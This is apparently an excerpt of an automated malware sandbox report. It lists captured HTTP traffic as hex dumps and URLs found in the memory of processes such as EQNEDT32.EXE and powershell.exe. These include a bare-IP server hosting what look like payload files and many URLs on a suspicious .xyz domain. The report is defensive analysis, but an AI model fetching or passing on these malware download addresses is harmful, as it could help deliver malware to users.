20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: ea8adc26-e34f-4563-b38d-a90a6d776e28x-runtime: 0.055378content-length: 18108connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 5dce5dc8-dfe6-4c3c-973a-f7abe45f17b2x-runtime: 0.070311content-length: 21532connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 16 Aug 2024 07:34:06 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 16 Aug 2024 07:34:08 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-16T07:34:11.3224225Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 16 Aug 2024 07:34:11 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-16T07:34:16.4085800Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 16 Aug 2024 07:34:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-16T07:34:18.9812535Z
            Source: powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.33
            Source: powershell.exe, 0000000A.00000002.444696114.000000000287A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.33/143/WRG.txt
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIF
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFauR
            Source: EQNEDT32.EXE, 00000005.00000002.423526234.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.210.150.33/143/mekissedbutterburnwithstronglips.tIFj
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 0000000A.00000002.445038073.0000000003649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 0000000A.00000002.446671943.0000000004E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 00000008.00000002.450023886.0000000002411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.444696114.0000000002621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/020e999970.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/028b06199910.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/030d06199908.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/04f06199934.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/053a799939.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/060b06199878.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/081b06199857.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/096e06199842.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/246f699747.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/247d06199691.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/254f06199684.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/284f06199654.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/293b06199645.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/307a06199631.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/318d06199620.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/328c06199610.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/338e699655.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/342d999648.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/343b06199595.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/365f06199573.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/374c899617.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/402d06199536.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/409b699584.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/432a06199506.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/451c06199487.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/458f999532.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/477d06199461.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/484d06199454.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/490a06199448.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/510b999480.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/516e06199422.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/544c06199394.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/546f06199392.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/603a06199335.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/619c06199319.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/660b899331.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/678b06199260.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/68f06199870.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/698e099301.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/704d06199234.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/70b099929.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/72f06199866.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/734e06199204.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/740e06199198.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/779c899212.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/800f099199.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/814d06199124.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/816e06199122.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/827f799165.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/850c06199088.html
            Source: wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/8c06199930.html
            Source: find.exe, 0000000D.00000002.621498585.0000000005150000.00000004.00000800.00020000.00000000.sdmp, find.exe, 0000000D.00000002.621202000.0000000002E98000.00000004.10000000.00040000.00000000.sdmp, wfbjvizcWo.exe, 0000000E.00000002.621060824.0000000003278000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2886080.xyz/Friends/975b06198963.html
